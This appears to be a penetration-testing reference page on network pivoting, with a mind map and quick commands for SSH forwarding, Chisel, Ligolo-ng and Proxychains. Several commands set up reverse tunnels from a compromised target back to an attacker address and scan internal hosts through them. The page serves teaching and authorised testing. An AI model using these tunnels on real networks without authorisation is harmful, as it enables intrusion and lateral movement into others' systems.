Pivoting Techniques
Methods for network pivoting
Pivoting, Tunneling & Port ForwardingTip: Click on any node to see related information!
Interactive Mind Map
graph TD
A[Compromised Host] --> B{Pivot Method}
B --> C[SSH Tunneling]
B --> D[Chisel]
B --> E[Ligolo-ng]
B --> F[Metasploit]
C --> G[-L Local Forward]
C --> H[-D Dynamic SOCKS]
C --> I[-R Remote Forward]
D --> J[SOCKS Proxy]
E --> K[TUN Interface]
F --> L[autoroute/portfwd]
Related Modules
Quick Reference
SSH Tunneling
ssh -L 8080:10.10.10.6:80 user@10.10.10.5 # Local port forward (access remote service locally) ssh -D 9050 user@10.10.10.5 # Dynamic port forward (SOCKS proxy) ssh -R 8080:localhost:80 user@10.10.14.5 # Remote port forward (expose local service remotely)
Chisel
# Server chisel server --reverse -p 8000 # Start Chisel server on attacker # Client chisel client 10.10.14.5:8000 R:socks # Connect from target to create SOCKS tunnel
Ligolo-ng
# Proxy ./proxy -selfcert # Start Ligolo proxy interface # Agent ./agent -connect 10.10.14.5:11601 -ignore-cert # Connect Ligolo agent from target
Proxychains
proxychains nmap -sT 10.10.10.6 # Scan through proxy (must use TCP connect scan)